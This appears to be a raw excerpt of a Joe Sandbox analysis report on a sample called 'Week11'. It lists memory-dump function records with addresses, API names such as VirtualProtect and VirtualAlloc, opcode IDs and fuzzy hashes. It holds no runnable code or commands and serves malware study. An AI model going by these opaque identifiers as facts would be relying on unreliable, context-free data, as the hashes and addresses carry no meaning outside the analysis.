                                • Instruction Fuzzy Hash: CC510472E082A49EFB20C624DC547EAB6B5EF91300F0480FAD44C97291D67E5FC5CB96
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: dc877d3fe7b79a28cc3d3649662ca546d540b84c0e9bf56fb1321480ad6ef9c7
                                • Instruction ID: b51d67149dbb00d868283c5381bebf80119ad10971e4809b2536dcf84b7e63c5
                                • Opcode Fuzzy Hash: dc877d3fe7b79a28cc3d3649662ca546d540b84c0e9bf56fb1321480ad6ef9c7
                                • Instruction Fuzzy Hash: DA51F3B1E042A49EFB20DB25DC547EABAB1AF51300F0480FAD44C97281D6BE4FC18B96
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ead0b19ecc58213b9d06ae37420c76cee20f2efd442f9463aaeea5c73c2c00e1
                                • Instruction ID: a22f68069a9855306980c494c3448997ae5b8d0e08073f83e26fc825e49b3b0a
                                • Opcode Fuzzy Hash: ead0b19ecc58213b9d06ae37420c76cee20f2efd442f9463aaeea5c73c2c00e1
                                • Instruction Fuzzy Hash: 2141D6B2D486549BFB248B14DCC4BEB7775EB80300F2441FBD90E62180D67C6EC68E16
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 54c194fb27ad8e3b78fa99a349d0b1540fb02fb75e8d0281de21f668eb8cc7be
                                • Instruction ID: 68017a6f9b64bf2a3d55eacd7dbf14f6d757b97c8a5a38e9a7908ae6b214f9aa
                                • Opcode Fuzzy Hash: 54c194fb27ad8e3b78fa99a349d0b1540fb02fb75e8d0281de21f668eb8cc7be
                                • Instruction Fuzzy Hash: BE310BF1D09358AFE7109634DC919EB3B38EF82304F0581BBE846555C2D53D5E968AA3
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 1dda3596db6ced86365d738de9dbcbfb896c99216b314a41d822641646d6f75b
                                • Instruction ID: 27b3d72db6d4c9e4102c49d2a0b8fdea9b1d36b5e39453587fb26ba7be69b3d3
                                • Opcode Fuzzy Hash: 1dda3596db6ced86365d738de9dbcbfb896c99216b314a41d822641646d6f75b
                                • Instruction Fuzzy Hash: 9B313EF1D08254AFE7109630CC556FB3B38EF82304F0581BBE44AA69C1D53D5E968B63
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b432eb99ea7be6d981de48fe8feea8b1c44bef03d4a9d04d6626f81593e97420
                                • Instruction ID: 803b4e947b9dba8bbbfd247c9ac1351694d6b3990931f683b318e264a5286070
                                • Opcode Fuzzy Hash: b432eb99ea7be6d981de48fe8feea8b1c44bef03d4a9d04d6626f81593e97420
                                • Instruction Fuzzy Hash: 43314CE1D08254AFE7109630CC55BFB3B34EF82300F0581BBE44A6A9C1D13D5E968B67
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b37b8ac6b1045dcc5e4679ad7b1326001a76aaec8bb1cd1f9fc2e143133f1bb9
                                • Instruction ID: 5dfabaa0502779c9556673698f864158be9eba2c41464935b1006d9cd6714dd8
                                • Opcode Fuzzy Hash: b37b8ac6b1045dcc5e4679ad7b1326001a76aaec8bb1cd1f9fc2e143133f1bb9
                                • Instruction Fuzzy Hash: 2A313AF1D08354AFE3108A30DC91AFB7B34EF82304F0581BBD44A669C2D53D5E968A53
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 9f9312d4a67fe1528c836305b17c3410519b1d63c77322ba58fcea7320c02a76
                                • Instruction ID: 3513981ace9329ce68b367b88346efa45b0adbe4d120b2e282f0555b26392776
                                • Opcode Fuzzy Hash: 9f9312d4a67fe1528c836305b17c3410519b1d63c77322ba58fcea7320c02a76
                                • Instruction Fuzzy Hash: CF212BF2E04114ABF3208665DC45EF77B7CEF90310F1441BBE80EA2681E53DAE958A63
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: de70f5704460281ce28e090cb355328a4a5a891dc6d1d7ba830e8a97c806e2fe
                                • Instruction ID: c60e1b38aafd9d8b1b2b6514fe5cebb1f1484462951c490b36691157f61a7cc5
                                • Opcode Fuzzy Hash: de70f5704460281ce28e090cb355328a4a5a891dc6d1d7ba830e8a97c806e2fe
                                • Instruction Fuzzy Hash: 3521EAB1D0D3949FE3119B34CC959AB7B34EF82300F0981FBD445569C2D53D5A9A8B53
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cfb4824c826509ea9393debc8c822bc8888ecb46761e71fb644ac920368247d
                                • Instruction ID: b982d31688b992a9a10665792c37709b97ba75409b13f9ffc5d7cba2d9dc1231
                                • Opcode Fuzzy Hash: 9cfb4824c826509ea9393debc8c822bc8888ecb46761e71fb644ac920368247d
                                • Instruction Fuzzy Hash: 5B2181B1D041699FEB28CF15DD44AEBB778EB89310F1041FAD40E96641D6349EC68F61
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 1c2a1999c9fd57952d49f1073d23a42f1ced81199c5832538b3697fa2647a165
                                • Instruction ID: f0b75b4441c9d37c42d0ae9f9f43850f7ba2223918dbdec60047f74229b53538
                                • Opcode Fuzzy Hash: 1c2a1999c9fd57952d49f1073d23a42f1ced81199c5832538b3697fa2647a165
                                • Instruction Fuzzy Hash: 6521A8B1D0862C9BDB208A51DC91AFA7B74EB51314F1442FBD84AA6681D2396EC18F93
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 051fae7594ffcc9bdc3f335987129d4eb93f07465e64b3f19de7ed127006d00b
                                • Instruction ID: e5dd3994f6b32ac1ff6ed4b8a0999b97d5aa9ab670d0f106e4f6901be4323d05
                                • Opcode Fuzzy Hash: 051fae7594ffcc9bdc3f335987129d4eb93f07465e64b3f19de7ed127006d00b
                                • Instruction Fuzzy Hash: B71196B1E0921CABE7208B10CC41BEBB778EB51304F1441FBE50966680D6396EC19E53
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: be11e4526977f0b0f227e85b99da83f8957ec219c10f3e679c5ee91d3b4100c0
                                • Instruction ID: 4925f64d2496caee3e557219cd1a7a6ec54885f7934185fd1c6884df780fe6af
                                • Opcode Fuzzy Hash: be11e4526977f0b0f227e85b99da83f8957ec219c10f3e679c5ee91d3b4100c0
                                • Instruction Fuzzy Hash: 10012BF1D0C314AFD3109B60CC529EB3B38DF51300F1441BFE54A66581D1396E568BA3
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 485a32b547078cfbe831a0a9ade745c6337b17f025fc704b3b1125bf43b7976e
                                • Instruction ID: cd5d031751ea870a61a7d4100524778f6358ef88cd4e2a1c594936d3688603b0
                                • Opcode Fuzzy Hash: 485a32b547078cfbe831a0a9ade745c6337b17f025fc704b3b1125bf43b7976e
                                • Instruction Fuzzy Hash: 6A117F70A04269DFDB25CB65EC94AEAB7B0AB45300F2040EFD149A7242DA745ED5CF11
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 855f5e80f9541c96a3a2d822a5a811061b195c471eb266dac1a6c7715dd1f34c
                                • Instruction ID: 274cb89beb1a3e6ab73d69a877b76f261775b139f2f77444169076f95774e751
                                • Opcode Fuzzy Hash: 855f5e80f9541c96a3a2d822a5a811061b195c471eb266dac1a6c7715dd1f34c
                                • Instruction Fuzzy Hash: 7401D6F1E18214ABE7108A50DC82FEB7B78EB55304F1441BBE90E61680D13D6E854BA3
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: d2e99ac6256d0a7d39fccb270f2fc7ac41bd82ed4ad80516182ddf7d2959af27
                                • Instruction ID: 597c9013eb682f45a94fe761983bdc02ce4bdebba091caedd36097ed53851130
                                • Opcode Fuzzy Hash: d2e99ac6256d0a7d39fccb270f2fc7ac41bd82ed4ad80516182ddf7d2959af27
                                • Instruction Fuzzy Hash: E20144F1E18218ABD7208A50DC81EEB7B78EB55304F1441FBE94E62680D5396F818FA3
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b90901113764cd49bbeb5faf1b2e5cfe7156d612a9053401008c56ac3d088e0d
                                • Instruction ID: 6e593ad78f11266b3d0d5a0e6c0c9e800c832fa8ae5a062fae9fe734989720c2
                                • Opcode Fuzzy Hash: b90901113764cd49bbeb5faf1b2e5cfe7156d612a9053401008c56ac3d088e0d
                                • Instruction Fuzzy Hash: 100148F1E18218ABD7208A50DC41EEB7B78DB55304F1441FBE94EA1680D5396F818FA3
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 51f71612e2857585a5d4d5d8945cf98c33817d09fb682abd9b2d9f92641cf950
                                • Instruction ID: f12e0ca71b6847934ea0494068f75b96b62ed845ec6b8c07d59b42710ea1b0c8
                                • Opcode Fuzzy Hash: 51f71612e2857585a5d4d5d8945cf98c33817d09fb682abd9b2d9f92641cf950
                                • Instruction Fuzzy Hash: A80144F1E18218ABD7208A50DC91EEB7B78EB55304F1441FBE94E62680D5396F818FA3
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 7a9ea11f322c8a829551b9b54ecbe6dd23da0f0eb2d9c6ba193f36ba04a269a3
                                • Instruction ID: 544e10bf16d661ead35c34841ea820961fc07b711cd9a117e8f26bd388227f72
                                • Opcode Fuzzy Hash: 7a9ea11f322c8a829551b9b54ecbe6dd23da0f0eb2d9c6ba193f36ba04a269a3
                                • Instruction Fuzzy Hash: 54016970E04669CBEB24CB95EC84AEAF7B1BB88300F1081EBD05DA7241CA745EC1CF15
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004074F1
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 55a8861f1dcad2f356bc3d61f64511ec5ac83e40df81549a46bac06715186c02
                                • Instruction ID: 25211521b3aac59db9137579fb048d154c1f79c3e79b1b3f0576d00875a9e760
                                • Opcode Fuzzy Hash: 55a8861f1dcad2f356bc3d61f64511ec5ac83e40df81549a46bac06715186c02
                                • Instruction Fuzzy Hash: 57F037F1E14528ABD710CA95CC51FE6B7BCEF55304F0051EBE54AE2680D139AF818F91
                                APIs
                                Memory Dump Source
                                • Source File: 00000001.00000002.2483016683.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                 • Associated: 00000001.00000002.2483016683.00000000038AF000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000001.00000002.2483016683.00000000038B3000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000001.00000002.2483016683.00000000038CF000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000001.00000002.2483016683.00000000038D8000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_31a0000_Week11.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 85b07341f977adfd1331a972d0bd069f00081ffb41b5367fe339be9e9d3b190f
                                • Instruction ID: 933be8071f0d6d3a30d3a4238a8b18ece7488d0241ab979ff6528888495a31a8
                                • Opcode Fuzzy Hash: 85b07341f977adfd1331a972d0bd069f00081ffb41b5367fe339be9e9d3b190f
                                • Instruction Fuzzy Hash: 82E09275505B40CFCB15DF28C2C5606BBF0EB88A00F0485A8DE098F70AE774EE10DAD2
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: c91b693d5b86d2ae11cf6c47b3df95c23ceaa6344db94eb5af2c9422f4b8f2d4
                                • Instruction ID: b19b272ba7b8afd569ed7e5b3ccce1395f6120d56c9f6e3fe858b590bc848e8d
                                • Opcode Fuzzy Hash: c91b693d5b86d2ae11cf6c47b3df95c23ceaa6344db94eb5af2c9422f4b8f2d4
                                • Instruction Fuzzy Hash: C29002A095C21786D76C1B60490C56A67345B45201F1105A9900660441467AAA415917
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 63bc6c53ace1f96f468e36bb05d3ea0da271d94e9b453ac4716fbbf942ad69cd
                                • Instruction ID: 2182a2bc2951b1d0c05ec37bfccbb6c8ce83d6ef750507758993ef2868f7758a
                                • Opcode Fuzzy Hash: 63bc6c53ace1f96f468e36bb05d3ea0da271d94e9b453ac4716fbbf942ad69cd
                                • Instruction Fuzzy Hash: 5BB13CB5D412289FEB24CB04CD90BEAB7B5AB88314F1081EAD80D67340D639AFD2CF45
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: aa7e30c676aceae8454a2925895b9f5c4b08368b89e8b5c03fe791a78a9e317b
                                • Instruction ID: 2c36e2ef7949768e12a41f281801e4518b13919899cc75e126bbf136d0b10824
                                • Opcode Fuzzy Hash: aa7e30c676aceae8454a2925895b9f5c4b08368b89e8b5c03fe791a78a9e317b
                                • Instruction Fuzzy Hash: 1F61E2F2D042249FE7248A14DC85BEBBB78EB85314F1481FAD80D56640DA3D9EC1CE56
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 39ff5318d904d516bc369f7d4827446bc9ba78b461e458f8c4452cc7e08be521
                                • Instruction ID: 3433568bdd03d9e58387906f7710b1891c9d69a8965d2e77df8ce32132d6582c
                                • Opcode Fuzzy Hash: 39ff5318d904d516bc369f7d4827446bc9ba78b461e458f8c4452cc7e08be521
                                • Instruction Fuzzy Hash: 5A51C0F2D042249FE7648A14DC95BEABB74EB84314F1481FAD80E16680DA3C9FC2CF56
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 0467bd9a255d1a34fee10fea58436218394323cdcf1befe17efbfd0023b53e75
                                • Instruction ID: c882dc5e11c2c7d98907ed4a7ac6dc61bef33483b0425c8da7a57d6d56d4f739
                                • Opcode Fuzzy Hash: 0467bd9a255d1a34fee10fea58436218394323cdcf1befe17efbfd0023b53e75
                                • Instruction Fuzzy Hash: 7441DDF1D042249FEB608B18DC94BEABB74AF80314F2441FAD50D57240DA38AEC2CF96
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 8189fd10e7184cbb88187df1274c58d88710965d10f12092d1ae1b5a567f378b
                                • Instruction ID: 99a8e39cd8b9aa7089544bf455d837836a2432c743ae676dcecce1bc371dc6a5
                                • Opcode Fuzzy Hash: 8189fd10e7184cbb88187df1274c58d88710965d10f12092d1ae1b5a567f378b
                                • Instruction Fuzzy Hash: CE31FCF1D042649FEB649B14CC94BEEBB71AF81318F2400EAD41D97241C6789EC1CF56
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
